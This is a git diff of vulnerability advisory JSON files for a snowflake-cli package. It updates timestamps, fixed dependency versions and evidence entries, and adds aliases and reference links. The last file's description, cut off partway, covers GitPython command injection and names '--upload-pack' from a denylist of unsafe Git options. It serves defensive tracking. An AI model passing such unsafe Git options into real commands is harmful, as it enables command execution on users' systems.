"id": "BREW-snowflake-cli-CVE-2025-66471", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-68146.json b/advisories/BREW-snowflake-cli-CVE-2025-68146.json index 31dc6a2611f..f6c225bf468 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-68146.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-68146", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:47:20Z", + "modified": "2026-09-10T20:54:18Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.1", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.4" + "resource_purl": "pkg:pypi/filelock@3.32.6" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", - "resource": "filelock" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", + "subject_version": "3.32.6", + "key": "pkg:pypi/filelock@3.32.6", "resource": "filelock" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-0994.json b/advisories/BREW-snowflake-cli-CVE-2026-0994.json index b3103c833d8..505c6acf6e6 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-0994.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-0994", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "5.29.6", - "key": "pkg:pypi/protobuf@5.29.6", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-15925.json b/advisories/BREW-snowflake-cli-CVE-2026-15925.json index d6215dc30a8..abf4e5609a1 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-15925.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-15925.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-15925", "published": "2026-09-02T09:59:39Z", - "modified": "2026-09-02T09:59:39Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5cc2-282f-jjq2", - "CVE-2026-15925" + "CVE-2026-15925", + "PYSEC-2026-3920" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.7.1", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-21441.json b/advisories/BREW-snowflake-cli-CVE-2026-21441.json index ea8203308db..0bd670c433c 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-21441.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-21441", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-22701.json b/advisories/BREW-snowflake-cli-CVE-2026-22701.json index dfac54e8c4b..04164fdefb6 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-22701.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-22701", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:47:20Z", + "modified": "2026-09-10T20:54:18Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.3", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.4" + "resource_purl": "pkg:pypi/filelock@3.32.6" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", - "resource": "filelock" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.4", - "key": "pkg:pypi/filelock@3.32.4", + "subject_version": "3.32.6", + "key": "pkg:pypi/filelock@3.32.6", "resource": "filelock" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-23949.json b/advisories/BREW-snowflake-cli-CVE-2026-23949.json index 1ab4190b937..eca39605e14 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-23949.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-23949", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-24049.json b/advisories/BREW-snowflake-cli-CVE-2026-24049.json index fd9a6d25f98..135a53817a3 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-24049.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-24049.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-24049", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-8rrh-rw8j-w5fx", "CVE-2026-24049", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.48.0", - "key": "pkg:pypi/wheel@0.48.0", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-25645.json b/advisories/BREW-snowflake-cli-CVE-2026-25645.json index aae70bce867..89200b8e1e5 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-25645.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-25645", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-27448.json b/advisories/BREW-snowflake-cli-CVE-2026-27448.json index 4eca0b0f8d5..25edd4ee400 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-27448.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-27448.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-27448", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-vp96-hxj8-p424", "CVE-2026-27448", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-27459.json b/advisories/BREW-snowflake-cli-CVE-2026-27459.json index 647d98b3603..778ee36c610 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-27459.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-27459.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-27459", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5pwr-322w-8jr4", "CVE-2026-27459", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-28684.json b/advisories/BREW-snowflake-cli-CVE-2026-28684.json index f010b30a3cb..eccaf16123e 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-28684.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-28684", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", - "resource": "python-dotenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-32597.json b/advisories/BREW-snowflake-cli-CVE-2026-32597.json index 4410656f25b..126eeec1b98 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-32597.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-32597", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-42215.json b/advisories/BREW-snowflake-cli-CVE-2026-42215.json index a957ad102ab..d4c9aae8c30 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-42215.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-42215", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.47", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-42284.json b/advisories/BREW-snowflake-cli-CVE-2026-42284.json index b3a6443fbd5..0b33b6e1910 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-42284.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-42284", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.47", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-44243.json b/advisories/BREW-snowflake-cli-CVE-2026-44243.json index 0803239ca8b..fc6b7019b2a 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-44243.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-44243", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:29Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.48", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-44244.json b/advisories/BREW-snowflake-cli-CVE-2026-44244.json index 9677f9c8f0f..c9c7edafb60 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-44244.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-44244", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.49", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-44431.json b/advisories/BREW-snowflake-cli-CVE-2026-44431.json index b1c3710b58b..88f994b0c7f 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-44431.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-44431", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-44432.json b/advisories/BREW-snowflake-cli-CVE-2026-44432.json index f91d26913f9..3aec4550670 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-44432.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-44432", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-4539.json b/advisories/BREW-snowflake-cli-CVE-2026-4539.json index faf3ca34e72..c6ecf9a36c9 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-4539.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-4539", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-45409.json b/advisories/BREW-snowflake-cli-CVE-2026-45409.json index 1e92991d1b9..1b3c0448a94 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-45409.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-45409", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-48522.json b/advisories/BREW-snowflake-cli-CVE-2026-48522.json index a5ad3180b75..837dbe20af2 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-48522.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-48522", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-48523.json b/advisories/BREW-snowflake-cli-CVE-2026-48523.json index 8f1d190652c..66c3c3135b0 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-48523.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-48523", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-48524.json b/advisories/BREW-snowflake-cli-CVE-2026-48524.json index 7c976c04db6..a24760784db 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-48524.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-48524", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-48525.json b/advisories/BREW-snowflake-cli-CVE-2026-48525.json index e109480d0d8..4dac1249f06 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-48525.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-48525", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-48526.json b/advisories/BREW-snowflake-cli-CVE-2026-48526.json index f1f6dde5bd2..73a9b90d142 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-48526.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-48526", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-59890.json b/advisories/BREW-snowflake-cli-CVE-2026-59890.json index 7a88386495f..893e9e988b8 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-59890.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-59890", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2026-67322.json b/advisories/BREW-snowflake-cli-CVE-2026-67322.json index d37f4ddaf5c..a92a4c4bcc0 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-67322.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-67322", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.52", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-67323.json b/advisories/BREW-snowflake-cli-CVE-2026-67323.json index 3cdf2daacf5..e081f881dcd 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-67323.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-67323", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,14 +46,14 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, 